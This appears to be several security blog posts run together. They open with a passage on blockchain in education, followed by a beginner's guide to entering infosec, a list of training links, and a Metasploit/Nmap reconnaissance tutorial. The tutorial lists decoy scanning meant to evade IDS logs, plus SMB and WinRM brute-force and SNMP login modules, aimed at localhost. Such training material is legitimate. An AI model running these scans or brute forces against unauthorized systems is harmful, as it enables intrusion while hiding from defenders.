(5) Develop educational smart contracts and build a new mode of network resources and platform operation. The smart contract technology in the blockchain can automate a large number of manual and semi-manual verification and management tasks in the current financial transaction process, and improve the intelligence of the transaction system. In the construction of open educational resources, using the transparency and automatic execution of smart contracts can realize the automatic execution of resource uploading, certification, transfer, sharing, etc., reduce the cost of resource sharing, improve the efficiency of resource sharing, and build a new form of network resource circulation . In addition, smart contracts can be used to build an efficient and intelligent online learning community, realize the “self-organization” operation of the learning community, monitor the ecological environment of the community in real time, automatically block and delete inappropriate speech, and create a positive community atmosphere.
Challenge of Using Blockchain in Education
Blockchain technology achieves the anonymity effect by isolating the connection between the transaction address and the real identity of the address holder, and prevents the disclosure of user privacy due to the transparency of transaction information. However, such protection can still be achieved by observing and tracking block information and user IDs. Track down the user’s personal information. Therefore, the application of blockchain technology in the field of education faces the risk of the privacy of teachers and students being leaked, mainly from the following two aspects: First, all transaction information is open and transparent, and any information can be tracked and queried, and then certain conclusions can be inferred. Or predict the status and behavior of teachers and students, which is not conducive to the protection of personal privacy of teachers and students; second, the security of the blockchain is guaranteed by algorithms. In theory, only more than 51% of node users are hacked at the same time. Data information however, with the development of mathematics, cryptography and computing technology, it is difficult to guarantee that the algorithm will not be cracked in the future, resulting in the leakage of teacher and student information.
Twitter: @jimmwayans | www.jimmwayans.com

How to be a Hacker or a Cybersecurity Expert?
So you want to be a Hacker?
Recently I’ve been reading a ton of questions, posts and general discussion about getting into the ‘Information Security’ game, and in my opinion at least it’s typically followed up by a fair amount of misleading information. That might be a little harsh considering I’m sure it’s good intentioned, it’s also even possible that the advice worked for them (there is no one size fits all advice) but I thought I’d lay my thoughts out here in the hope of helping a new budding hacker or infosec enthusiast move forward.
I want to play sport, where should I start?
This vague, open ended and very ambiguous question is very similar to someone asking how they should go about getting into information security. The first thing to realize is, there is a huge range of information security fields, and within each of those huge fields, is a lifetime’s worth of learning content. Just like picking a sport there is no ‘best’, it’s simply sometimes area’s you may enjoy more than others. Off the top of my head here are some example area’s that is by no means exhaustive:
How to be a Hacker
- Web Application Security
- Mobile Application Security
- Reverse Engineering
- Malware Reverse Engineering
- Cloud Security
- Network Security
- Incident Response
- Hardware Hacking
- IoT Hacking
- Risks, Governance and Compliance
- Programming / Creating Tools for Others
- Exploit Development
- Forensics
- etc…
Some of these are more of a technical nature while others are more of a theoretical focus. I guarantee that whatever you like there are others out there who will find it boring, just as you will with what others are interested in sometimes. Right now it’s expected that if you’re reading this you may know very little about any of these area’s but what’s important is your willingness to learn and what type of motivation you have.
The Hacking Type
One trademark that is almost universal of people throughout those fields is their focus on independent, self directed learning. Unfortunately in some ways security is still considered a ‘dark art’, I mean why would anyone want to know how to break into a computer system unless they were going to do so? As a result plenty of people will show disdain to outright hostility when asking about security related questions under the false (perhaps sometimes true) assumption it’s merely a ‘script kiddie’ looking to learn to hack systems instead of wanting to learn and use that knowledge for a good purpose. It’s also a fact that the ‘learning’ resources of information security are quite disjointed with no real central repository of learning material.
The point of highlighting this is that if you wish to prosper and successfully enter into the information security field you should be prepared to jump in and find your way without waiting for someone to hold your hand and lead you down the right path. Google some of the above terms and see what sounds like fun. Despite what sometimes seems like a constant battle to find the ‘best’ field to learn, or the ‘best’ resource, or the ‘best’ way to learn often more time is spent procrastinating wondering these questions rather than dedicating the time to actually learning. Look up video’s on youtube for hacking examples – it’s ok if you don’t know what a lot of it means, but write down a list then google those terms. Use points of interest to spawn out with an ever increasing web of knowledge around topics you’re interested in.
Do I need to learn X first?
Of course you need to have a full knowledge of the OSI layer before you begin. Yes you need to read that 1000 page book on the TCP protocol. Yes you need to be proficient in 5 programming languages (at least!) before you consider hacking. Can you compile your own Linux kernel from source code? No? Don’t bother learning hacking. Actually…. all that is full of rubbish, yet it’s one of the most common responses given to people looking to learn information security. There is one requirement to becoming a decent hacker – interest. The difference between a future hacker and a script kiddie isn’t knowledge, it’s the willingness to learn.
As long as you have a vague idea of how to use a computer you’re at the starting point you can work with. Yes if you don’t have a solid understanding of how TCP works you should have that on your to-do list to look up when someone is talking about it in a hacking tutorial – but it’s ridiculous to think you need a ton of prerequisite knowledge before you’re allowed to start learning about topic’s you’re interested in. When you’re looking up how that login puzzle works on a hacking site and it uses JavaScript you’re going to learn how JavaScript works. When you read through how a buffer overflow works and it has a Python template you’ll learn some basics of Python. No, you won’t get a job as a developer in those languages at the end of it but you’ll pick up the common way’s to break the language.
Informal Learning
“Ok, I get the hint – I need to learn things myself, but can you at least give me a starting point?”
Sure, there are a ton of great free or cheap resources out there to get started depending on what topic appeals to you. Here are some examples.
Web Application Security
- HackThisSite – Good for some basic web based challenges (link)
- Enigma Group – Similar to Hack this site (link)
- Hack The Box – A massive, online cybersecurity training platform (link)
- OWASP Top 10 – Idea of what are the most common vulnerabilities (link)
- TryHackMe – a free online platform for learning cyber security (link)
- OWASP Broken Wep Apps – A virtual computer you can load up to practice hacking skills on your network (link)
- Pentesting Lab – Another web focused virtual machine (link)
- In fact anything from vulnhub that interested you is good (link)
- The Web Application Hackers Handbook – The book on web hacking and vulnerabilities (link)
Reverse Engineering / Malware Reversing
- Lena’s Tutorials – Known as pretty much one of the best introductions to reverse engineering (link)
- The Legends of Random – Again another solid set of tutorials for reverse engineering (link)
- Reversing: Secrets of Reverse Engineering – A good book on the foundation’s of reverse engineering (link)
- Practical Malware Analysis – A great book focusing on reversing malware (link)
- Malware Analysts Cookbook – Another book focusing on reversing malware (link)
Network Security
- Virtual Machines dominate this category as they allow you to practice against real machines. Head to vulnhub and download any VM that looks interesting (link)
- Metasploit Unleashed – A solid run through of the metasploit testing framework to be used in conjunction against VM’s. (link)
- The Basics of Hacking and Penetration Testing – A very basic look at penetration testing useful for those completely new to the field. (link)
- Metasploit – The Penetration Testers Guide – Another book focusing around the use of metasploit in penetration testing (link)
- Because this is such a huge field often it’s breaking it down into one aspect, then researching that aspect specifically. Blogs are your best friend here. (link)
Exploit Development
- Corelan – This is by far the best resource out there for learning about exploit development. (link)
- FuzzySecurity – Another good learning resource with some tutorials available (link)
- Exploit-DB – One of the best things you can do is find examples of exploits (often with apps attached) and try and replicate the exploit independently (link)
- Hacking – The Art of Exploitation – A fantastic book that covers ton’s of different exploitation techniques (link)
- The Shellcoders Handbook – Another fantastic book on exploit development and shellcoding (link)
Other than that, Google, Google, and some more Google. I’ve left off some area’s such as forensics and compliance because personally I’m not interested in them so I haven’t gone looking for resources, I’m sure there are some fantastic ones out there.
Formal Learning
Outside of the free resources you can also begin to get certificates to make yourself more appealing to employers if you wish to transition into the field as more of a career path. Some certification’s I’d highly recommend would be the “Penetration Testing with Kali Linux” course from Offensive Security (link) if you’re interested in network security. It’s easily one of the best learning experiences I’ve ever had in the field and taught me more in 60 days than I’d learnt in a year on my own. Their “Cracking the Perimeter” is also a great course, focusing a little more on exploit development (link).
If you’re looking at developing your programming skills things like SecurityTube’s “Python for Pentesters and Hackers” (link) is a great foundation that will teach you how to do plenty of nifty things like building your own port scanners, password crackers etc. I don’t place a huge value into their certification’s that they offer from an employment perspective, but I’d look at it more as a consolidated lump of knowledge and examples for sale which can still be valuable.
The “Certified Ethical Hacker” course is another commonly mentioned. Honestly it’s typically looked down upon so I don’t think it’s necessarily worth the money – but if you need a formal course to learn things then it might be worth the money to you. A lot of these certifications and their value are discussed over at TheEthicalHacker.net’s forums located here.
“Just seeing if you can”
Hacking is all about gaining access to things that we’re not meant to. Creating an exploit, finding a SQL injection, Password Cracking it’s all designed to put us towards the goal of taking control of the box we’re attacking. I guarantee almost every new hacker has started dreaming about “Just seeing if they can” get access to that school website. “Just seeing if they can” gain access to the neighbors WiFi network. Sending their friend a trojan virus “just to see if they can” take control. Worse still you might end up visiting places like HackForums.net and seeing a lot of people trying to infect others with RATs, build botnet’s etc under the impression this is hacking, or sadly that this is the only way you can learn.
I need to emphasize that this is not the case. Any type of “just seeing if you can” type exercises can be replicated through the use of virtual machines, your own routers or even capture the flag / wargame competitions out there. Being realistic even if you can access another person’s machine, what are you going to do with it? Are you really going to try and steal credit card details and make fraudulent transactions? Are you really going to steal passwords and be paranoid that your activity is going to be traced back to you for the sake of peeking at someone’s emails? There have been plenty of examples of newbies being charged, not realizing the seriousness of the crimes they are committing. If you went for a job with the FBI and they had a look through your post history would you like them to read that post about you asking how to host a botnet? It’s a classic example of what’s on the internet is forever, and if you really want a career in information security you need that clean record to obtain any security clearances you’re going to need to do your job. Getting caught for stupid stuff just isn’t worth it.
Summary
So after a long ramble, what’s the key points?
- A hacker will actively seek out information, not wait for others to give it to him
- The difference between a script kiddie and a new hacker is the desire to learn
- You need to experiment with a wide range of information security fields to find what interests you
- Don’t let anyone tell you that there are prerequisites for learning information security, there isn’t.
- It’s not worth “just seeing if you can” do anything that isn’t legal, the risk vs reward makes no sense for doing so
- With courses, wargames, capture the flags and more importantly virtual machines there is no hacking scenario that can’t be replicated legally
Have fun, sorry if it got preachy towards the end and enjoy pwning boxes! Information security is an awesome field and you’ll be learning something new every day that you’re involved in it. There is no right answer for getting into the field apart from jumping into it with both feet. Get wet, learn to tread water and stay afloat, one day you might even be able to swim a little!
Find me on twitter @jimmwayans

Information/Cyber Security Cheat Sheet
This is a recollection of links and resources I have found / been told about over the years. I developed this post in the hope to map out good resources in the industry, facilitating the spread of knowledge, no matter the skill level.
If any errors are spotted, or any links need adding / updating / removing. Please contact me via Twitter @jimmwayans (https://twitter.com/jimmwayans).
CTF Site Links
The King Of CTF Pages – https://ctftime.org/
247CTF – https://247ctf.com
HackTheBox – https://hackthebox.eu/
RootMe – https://root-me.org/
0x0539 – https://0x0539.net/
Laptop Hacking Coffee – https://ctf.laptophackingcoffee.org/
pwnable tw – http://pwnable.tw/ (Only BinExp)
pwnable kr – http://pwnable.kr/ (Only BinExp)
PicoCTF – https://picoctf.com/ (Beginner friendly)
reversing kr – http://reversing.kr/
The Stereotyped Challenges – https://chall.stypr.com/
SDSLabs CTF – https://backdoor.sdslabs.co/
Payload Cheat Sheets
PayloadsAllTheThings – https://github.com/swisskyrepo/PayloadsAllTheThings
BurpSuite XSS Cheat Sheet – https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
OSCP Preparation
Sam’s Review / Guide – https://coffeejunkie.me/OSCP-Exam-Overview/
R4J Buffer Overflow – https://github.com/r4j0x00/oscp-like-stack-buffer-overflow
Computerphile BoF Explanation – https://www.youtube.com/watch?v=1S0aBV-Waeo
g0tm1lk Linux Priv Esc Cheat Sheet – https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Windows Priv Esc – https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
Windows Priv Esc (built around OSCP) – https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
SAST Practice Pages
Secure Code Warrior – https://securecodewarrior.com/
ExploitDB (May require imagination) – https://www.exploit-db.com/
All Around Practical Learning (non-competitive)
OWASP Juice Shop – https://owasp.org/www-project-juice-shop/
Pentester Labs – https://pentesterlab.com/
OverTheWire – https://overthewire.org/ (Beginner friendly)
Pentester Academy – https://www.pentesteracademy.com/
PortSwigger Labs – https://portswigger.net/web-security
OverTheWire – http://www.overthewire.org/
CTFLearn – http://ctflearn.com/
VulnHub – http://vulnhub.com/
Hacker101 – https://www.hacker101.com/
OSINTme – https://osintme.com/
All Around Theory Learning (non-competitive)
OWASP – https://owasp.org/
BurpSuite Research – https://portswigger.net/research
HumbleBundle Cyber Security Books – https://www.humblebundle.com/books/cybersecurity-2020-wiley-books?hmb_source=navbar&hmb_medium=product_tile&hmb_campaign=tile_index_4
Free SANS courses for the fundamentals – https://www.cyberaces.org/courses.html
Relevant Blogs / Podcasts
Security Weekly – https://securityweekly.com/category-shows/application-security-weekly/
Darknet Diaries – https://darknetdiaries.com/
TheManyHatsClub – https://themanyhats.club/
0x00Sec (Community Blog) – https://0x00sec.org/
Secret Club – https://secret.club/
g0tm1lk – https://blog.g0tmi1k.com/
Cybering – https://cybering.cc/
Twitch Hacking Channels (English)
TheBlindHacker – https://www.twitch.tv/theblindhacker
GeoHotz – https://www.twitch.tv/georgehotz
LiveOverflow – https://www.twitch.tv/LiveOverflow
Twitch Hacking Channels (Spanish)
S4vitar – https://www.twitch.tv/s4vitaar
Youtube Channels Pentesting (English)
HackerSploit – https://www.youtube.com/channel/UC0ZTPkdxlAKf-V33tqXwi3Q
IppSec – https://youtube.com/ippsec
TheCyberMentor – https://www.youtube.com/channel/UC0ArlFuFYMpEewyRBzdLHiw
LiveOverflow – https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w
Computerphile – https://www.youtube.com/user/Computerphile
Relevant Discord Servers and Communities
TheManyHatsClub – https://discord.gg/infosec
ThugCrowd – https://thugcrowd.com/
LaptopHackingCoffee – https://laptophackingcoffee.org/doku.php?id=start
HackTheBox – https://discord.gg/hRXnCFA
0x00Sec – https://discord.gg/PHM9Wak (https://0x00sec.org)
John Hammond Discord – https://discord.gg/Kgtnfw4
ReSwitched – https://discordapp.com/invite/ZdqEhed
ur-hackr – https://ur-hackr.com/
Companies Offering Certificates
ELearnSecurity – https://elearnsecurity.com/
Pentester Academy – https://www.pentesteracademy.com/
Offensive Security – https://www.offensive-security.com/
HackTheBox – https://hackthebox.eu/
Other Relevant Links
The Cybrary – https://www.cybrary.it/
CyberFirst – https://www.ncsc.gov.uk/cyberfirst/
Mind Map Everything – https://www.amanhardikar.com/mindmaps.html
Events around London – https://medium.com/@securestep9/cybersecurity-infosec-appsec-meetups-events-in-london-3688c4a42ea6
Razvi’s List of Hacking Sites – https://razvioverflow.github.io/starthacking
Peerlyst – https://www.peerlyst.com/
CTFs for beginners – https://twitter.com/JenF3rr_/status/1208577793359003648
HackerOne Bugbounty page – https://hackerone.com/
Using Twitter for InfoSec – https://dev.to/vickilanger/that-s-it-that-s-the-tweet-send-3e0h
CVE feed from the mitre – https://cve.mitre.org/

Active Information Gathering with Metasploit-Framework
Using Nmap to perform port scanning
Using -sT scanning mode is the default scanning mode of Nmap. The status of the target port is accurately judged through the TCP three-way handshake packet. Since three connections are established, it is extremely easy to be captured by the target firewall.
msf> nmap -sT 127.0.0.1
The -sS scan mode does not perform three-way handshake, it is called semi-open scan, also known as stealth scan. Compared to TCP scanning, it is faster and more secure.
msf> nmap -sS 127.0.0.1
The –sU scan mode is the fastest scan method, because UDP only sends and receives, but there may be some errors between the scan results and the above two scan methods.
msf> nmap -sU 127.0.0.1
Operating system identification.
Nmap can identify the target operating system in two ways:
1. The commonly used -O parameter, the -O parameter is an advanced parameter provided by Nmap, which is usually used alone.
msf> nmap -O 127.0.0.1
2. The -sV parameter can be used together with the above port scan parameters, and nmap will add the identification result of the system version at the end of the scan result.
msf> nmap -sSV 127.0.0.1
Nmap security scan
Usually, the scan initiated on the target site or host will be recorded by the WAF or IDS, which is extremely insecure for the tester, so the intrusive and deceptive scans are hidden from the tester. IP information is necessary, Nmap provides the -D advanced parameter, if you provide 2 IP addresses, then Nmap will leave 3 IP addresses in the WAF log to confuse the audience and ensure the test as much as possible the safety of the user.
msf> nmap -sS 127.0.0.1 -D 10.10.20.100,10.10.20.101
1. TCP port scan
msf>
use auxiliary/scanner/portscan/tcp
2. SYN port scan
msf>
use auxiliary/scanner/portscan/syn
3. Call nmap
In metasploit-framework use db_nmap to do a complete banner grabbing, use the following command:
msf> db_nmap -Pn -sTV -T4 --open --min-parallelism 64 --version-all 127.0.0.1 -p - 22
The -Pn parameter tells Nmap that the target site has been determined to be online, no further detection is required, and the detection process of whether it is online or not is skipped. -sTV means to scan in TCP mode, and to determine the banner information and version of each port at the same time. The port, the –min-parallelism parameter executes a minimum number of 64 parallelisms, the –version-all parameter indicates that all probes of nmap are used to identify the service details, and the -p parameter is set to – indicates that all ports of the target are scanned.
4. Use ARP for live host scanning
msf>
use auxiliary/scanner/discovery/arp_sweep set RHOST set THREADS 10 run
5. Use UDP to detect live hosts
msf>
use auxiliary/scanner/discovery/udp_sweep set RHOST set THREADS 10 run
6. Use SMB to detect live hosts
msf>
use auxiliary/scanner/smb/smb_enumshares set RHOSTS set THREADS 10 run
7. SMB version scan
msf>
use auxiliary/scanner/smb/smb_version
8. SMB brute force (dictionary required)
msf>
use auxiliary/scanner/smb/smb_login
9. SSH version scan
msf>
use auxiliary/scanner/ssh/ssh_version
10. FTP version scan
msf>
use auxiliary/scanner/ftp/ftp_version
11. SMTP enumeration
msf>
use auxiliary/scanner/smtp/smtp_enum
12. SNMP login
msf>
use auxiliary/scanner/snmp/snmp_enum
13. SNMP login
msf>
use auxiliary/scanner/snmp/snmp_login
14. WinRM scan
msf>
use auxiliary/scanner/winrm/winrm_auth_methods
15. WinRM brute force cracking
msf>
use auxiliary/scanner/winrm/winrm_cmd